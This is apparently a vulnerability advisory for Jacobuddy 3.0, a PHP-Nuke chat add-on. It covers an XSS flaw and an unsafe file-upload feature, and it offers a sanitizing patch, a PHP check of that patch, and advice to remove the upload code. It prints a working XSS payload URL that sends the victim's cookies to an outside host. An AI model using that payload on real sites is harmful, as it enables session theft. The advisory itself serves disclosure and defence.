Jacobuddy Cross Site Scripting (XSS) And Upload Exploit
Date: Saturday, March 01 @ 23:44:02 CET Topic: Security
Officially Released For Publication by Computer Cops.
Jacobuddy, a JavaScript real-time chat module, is an independent add-on for the open source GNU/GPL content management system PHP-Nuke. Computer Cops has discovered that Jacobuddy version 3.0 is vulnerable to Cross Site Scripting (XSS) and file system manipulation. Our practice is to contact the author prior to a public posting; in this case we have also supplied a fix for both vulnerabilities in this add-on.
The following URL is a sample of how Jacobuddy can be seeded with an XSS exploit within the message body:
http://www.laudanski.com/"style="background-image:url(javascript:nurl='http://www.laudanski.com/j.cgi?';nurl=nurl+document.cookie;document.URL=nurl)
In the current unpatched version, the receiver's pop-up Jacobuddy message is automatically redirected to another site, which captures their cookies for the attacked site.
The patch for this is applied to the buddy.php file:
In the following function block:
function send($to, $to_userid, $message, $subject) {
Add the following line after the global statement:
$message = htmlspecialchars(strip_tags($message));
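To verify that the one-line fix above actually neutralises the sample payload, the following is an added example (not part of the advisory or of the Jacobuddy code); the function names are assumptions, and ENT_COMPAT is passed explicitly because PHP 8.1 changed the default flags of htmlspecialchars() to ENT_QUOTES, whereas the PHP of the advisory's era left single quotes unencoded.

```php
<?php
// Added example: apply the advisory's sanitizer to its own sample payload and
// check whether the result can still terminate an HTML attribute value.

// The advisory's fix as it behaved on the PHP of the time (double quotes
// encoded, single quotes left alone).
function sanitize_message_as_patched(string $message): string {
    return htmlspecialchars(strip_tags($message), ENT_COMPAT);
}

// Stricter variant: ENT_QUOTES also encodes single quotes, so the message is
// safe inside single-quoted attributes as well.
function sanitize_message_strict(string $message): string {
    return htmlspecialchars(strip_tags($message), ENT_QUOTES, 'UTF-8');
}

// True when $s contains the quote character that delimits the surrounding
// attribute, or '<', i.e. when the sanitized text could still break out.
function can_break_out(string $s, string $attr_quote): bool {
    return strpbrk($s, $attr_quote . '<') !== false;
}

// The payload from the advisory, as it would arrive in the message body.
// Note that it contains no tags at all, so strip_tags() alone would pass it
// through untouched; the protection comes from htmlspecialchars().
$advisory_payload = "http://www.laudanski.com/\"style=\"background-image:url(javascript:"
    . "nurl='http://www.laudanski.com/j.cgi?';nurl=nurl+document.cookie;document.URL=nurl)";

$sanitizers = [
    'patched' => 'sanitize_message_as_patched',
    'strict'  => 'sanitize_message_strict',
];

foreach ($sanitizers as $label => $fn) {
    $out = $fn($advisory_payload);
    printf("%-8s breaks out of \"...\": %-3s breaks out of '...': %-3s\n",
        $label,
        can_break_out($out, '"') ? 'yes' : 'no',
        can_break_out($out, "'") ? 'yes' : 'no');
    echo "         ", $out, "\n";
}
```

With the advisory's fix the double-quoted attribute used by the sample payload is closed off, but a message inserted into a single-quoted attribute would still need the ENT_QUOTES variant.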
The next vulnerability is the infamous dcc file transfer within the buddy.php file.
Any file uploaded through it remains on the server. An uploaded malicious script could read vital file system data, such as the PHP-Nuke config.php file, and write it out as a text file for the uploader to retrieve. Computer Cops highly advises that the entire dcc function be removed from the file, together with the dcc case block and the $who_online clause for the dcc link.
Computer Cops will make an attempt to contact the vendor with this information.